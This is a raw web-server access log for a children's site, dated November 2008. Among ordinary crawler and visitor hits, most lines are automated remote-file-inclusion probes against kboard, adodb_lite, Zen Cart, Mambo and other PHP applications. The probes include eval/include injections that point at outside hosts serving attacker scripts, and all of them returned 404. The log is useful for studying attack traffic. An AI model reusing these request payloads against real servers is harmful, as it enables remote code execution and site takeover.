64.13.249.26 - - [21/Nov/2008:02:45:49 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.groundviewproductions.org/Store/bo.do? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "-"
61.8.3.74 - - [21/Nov/2008:02:46:10 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:46:11 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
72.52.189.40 - - [21/Nov/2008:02:48:02 -0700] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.52.189.40 - - [21/Nov/2008:02:48:02 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.52.189.40 - - [21/Nov/2008:02:48:02 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
61.8.3.74 - - [21/Nov/2008:02:48:58 -0700] "GET /logs/access_log.old/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:48:58 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:02:48:59 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
38.103.63.57 - - [21/Nov/2008:02:50:24 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
220.73.130.39 - - [21/Nov/2008:02:52:09 -0700] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
220.73.130.39 - - [21/Nov/2008:02:52:09 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
220.73.130.39 - - [21/Nov/2008:02:52:09 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
195.137.143.11 - - [21/Nov/2008:02:52:47 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:52:47 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
67.18.151.242 - - [21/Nov/2008:02:52:49 -0700] "GET //dotproject//includes/db_adodb.php?baseDir=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
67.18.151.242 - - [21/Nov/2008:02:52:51 -0700] "GET /logs//dotproject//includes/db_adodb.php?baseDir=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "-"
195.137.143.11 - - [21/Nov/2008:02:52:52 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:02:52:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
216.65.20.132 - - [21/Nov/2008:02:54:33 -0700] "GET /logs/error_log.old//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
216.65.20.132 - - [21/Nov/2008:02:54:33 -0700] "GET //twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "-"
216.65.20.132 - - [21/Nov/2008:02:54:54 -0700] "GET //twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
202.123.69.25 - - [21/Nov/2008:02:55:25 -0700] "GET /logs/access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
202.123.69.25 - - [21/Nov/2008:02:55:25 -0700] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
202.123.69.25 - - [21/Nov/2008:02:55:25 -0700] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
216.65.20.132 - - [21/Nov/2008:02:58:05 -0700] "GET /logs//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:02:58:05 -0700] "GET //twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:02:58:06 -0700] "GET /logs//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:02:58:06 -0700] "GET //twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.52.189.40 - - [21/Nov/2008:02:59:05 -0700] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.52.189.40 - - [21/Nov/2008:02:59:05 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.52.189.40 - - [21/Nov/2008:02:59:05 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
216.65.20.132 - - [21/Nov/2008:02:59:35 -0700] "GET /logs/error_log.old//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:02:59:36 -0700] "GET //twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:02:59:36 -0700] "GET /logs//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
216.65.20.132 - - [21/Nov/2008:03:00:16 -0700] "GET /logs/access_log.old//twindow_search_rank.php?shop_this_skin_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
209.172.44.52 - - [21/Nov/2008:03:00:53 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
209.172.44.52 - - [21/Nov/2008:03:00:59 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
220.73.130.39 - - [21/Nov/2008:03:01:32 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
220.73.130.39 - - [21/Nov/2008:03:01:32 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
220.73.130.39 - - [21/Nov/2008:03:01:32 -0700] "GET /logs/access_log.old/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
220.73.130.39 - - [21/Nov/2008:03:01:32 -0700] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
195.137.143.11 - - [21/Nov/2008:03:02:35 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:02:37 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
72.30.142.247 - - [21/Nov/2008:03:05:13 -0700] "GET /wwwstat/Nov.usage.html HTTP/1.0" 200 10763 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
38.103.63.57 - - [21/Nov/2008:03:05:44 -0700] "GET /wwwstat/Oct.usage.html HTTP/1.1" 200 12387 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
38.99.44.103 - - [21/Nov/2008:03:06:14 -0700] "GET /images/animalsinsects/?S=A HTTP/1.0" 200 976 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
220.73.130.39 - - [21/Nov/2008:03:07:02 -0700] "GET /logs/access_log%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.79" "-"
72.30.81.179 - - [21/Nov/2008:03:08:57 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.81.179 - - [21/Nov/2008:03:08:57 -0700] "GET /images/ HTTP/1.0" 200 10943 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
75.44.145.41 - - [21/Nov/2008:03:09:17 -0700] "GET /favicon.ico HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "-"
72.30.142.247 - - [21/Nov/2008:03:11:31 -0700] "GET /oldcalendars/calendarmay06.htm HTTP/1.0" 200 90474 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
195.137.143.11 - - [21/Nov/2008:03:13:11 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:13:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:13:11 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:13:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.103.63.57 - - [21/Nov/2008:03:15:01 -0700] "GET /wwwstat/Jul.usage.html HTTP/1.1" 200 11035 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
72.32.68.153 - - [21/Nov/2008:03:19:08 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "-"
72.32.68.153 - - [21/Nov/2008:03:19:08 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "-"
209.62.121.162 - - [21/Nov/2008:03:20:08 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "-"
209.62.121.162 - - [21/Nov/2008:03:20:10 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://phoenixgc.net/help/bo.do?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "-"
38.103.63.57 - - [21/Nov/2008:03:21:00 -0700] "GET /wwwstat/2006.Apr.usage.html HTTP/1.1" 200 9133 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
195.137.143.11 - - [21/Nov/2008:03:22:04 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:22:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:22:37 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
195.137.143.11 - - [21/Nov/2008:03:22:37 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.natuurenwetenschap.be/readme.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
65.214.44.28 - - [21/Nov/2008:03:22:53 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "-" "-"
65.214.44.28 - - [21/Nov/2008:03:22:53 -0700] "GET /theaters.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "-"
85.214.21.28 - - [21/Nov/2008:03:28:08 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.21.28 - - [21/Nov/2008:03:28:08 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.21.28 - - [21/Nov/2008:03:28:08 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
85.214.21.28 - - [21/Nov/2008:03:28:08 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.103.63.57 - - [21/Nov/2008:03:28:29 -0700] "GET /wwwstat/2006.Nov.usage.html HTTP/1.1" 200 8717 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
66.34.133.35 - - [21/Nov/2008:03:28:42 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
66.34.133.35 - - [21/Nov/2008:03:28:42 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
66.34.133.35 - - [21/Nov/2008:03:28:43 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
66.34.133.35 - - [21/Nov/2008:03:28:44 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
69.65.105.48 - - [21/Nov/2008:03:31:32 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
69.65.105.48 - - [21/Nov/2008:03:31:32 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
69.65.105.48 - - [21/Nov/2008:03:31:34 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
69.65.105.48 - - [21/Nov/2008:03:31:34 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
94.229.68.13 - - [21/Nov/2008:03:32:06 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=linarie.com/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
69.73.151.5 - - [21/Nov/2008:03:33:40 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
69.73.151.5 - - [21/Nov/2008:03:33:40 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
38.103.63.57 - - [21/Nov/2008:03:34:42 -0700] "GET /wwwstat/2007.Jun.usage.html HTTP/1.1" 200 10552 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
69.73.151.5 - - [21/Nov/2008:03:34:56 -0700] "GET /logs//header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
69.73.151.5 - - [21/Nov/2008:03:34:56 -0700] "GET //header.php?base_folder=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
64.182.252.18 - - [21/Nov/2008:03:36:41 -0700] "GET /logs/access_log.old/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.0" 404 - www.wnckids.com "-" "libwww-perl/5.53" "-"
64.182.252.18 - - [21/Nov/2008:03:36:41 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.0" 404 - www.wnckids.com "-" "libwww-perl/5.53" "-"
64.182.252.18 - - [21/Nov/2008:03:36:42 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.0" 404 - www.wnckids.com "-" "libwww-perl/5.53" "-"
211.202.2.220 - - [21/Nov/2008:03:37:56 -0700] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
211.202.2.220 - - [21/Nov/2008:03:37:58 -0700] "GET //modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
211.202.2.220 - - [21/Nov/2008:03:37:58 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
85.98.224.200 - - [21/Nov/2008:03:38:11 -0700] "GET /favicon.ico HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
85.98.224.200 - - [21/Nov/2008:03:38:12 -0700] "GET /oldcalendars/calendarjan06.htm HTTP/1.1" 200 31940 www.wnckids.com "http://www.google.com.tr/search?hl=tr&q=wnc+bebe&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
85.98.224.200 - - [21/Nov/2008:03:38:12 -0700] "GET /images/SMALLFINALWNCLOGO.jpg HTTP/1.1" 200 17854 www.wnckids.com "http://www.wnckids.com/oldcalendars/calendarjan06.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
85.98.224.200 - - [21/Nov/2008:03:38:13 -0700] "GET /images/adimages/healthadvenrainad.jpg HTTP/1.1" 200 36412 www.wnckids.com "http://www.wnckids.com/oldcalendars/calendarjan06.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
94.229.68.13 - - [21/Nov/2008:03:38:16 -0700] "GET /logs/access_log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=linarie.com/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.229.68.13 - - [21/Nov/2008:03:38:16 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=linarie.com/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
94.229.68.13 - - [21/Nov/2008:03:38:16 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=linarie.com/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.99.44.103 - - [21/Nov/2008:03:38:20 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
211.202.2.220 - - [21/Nov/2008:03:38:27 -0700] "GET /logs/access_log//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
211.202.2.220 - - [21/Nov/2008:03:38:27 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
211.202.2.220 - - [21/Nov/2008:03:38:29 -0700] "GET //modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
85.98.224.200 - - [21/Nov/2008:03:39:26 -0700] "GET /calendar.htm HTTP/1.1" 404 - www.wnckids.com "http://www.wnckids.com/oldcalendars/calendarjan06.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
85.98.224.200 - - [21/Nov/2008:03:39:33 -0700] "GET /images/SMALLFINALWNCLOGO.jpg HTTP/1.1" 304 - www.wnckids.com "http://www.wnckids.com/oldcalendars/calendarmay06.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
85.98.224.200 - - [21/Nov/2008:03:39:33 -0700] "GET /oldcalendars/calendarmay06.htm HTTP/1.1" 200 90474 www.wnckids.com "http://www.google.com.tr/search?hl=tr&q=wnc+bebe&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
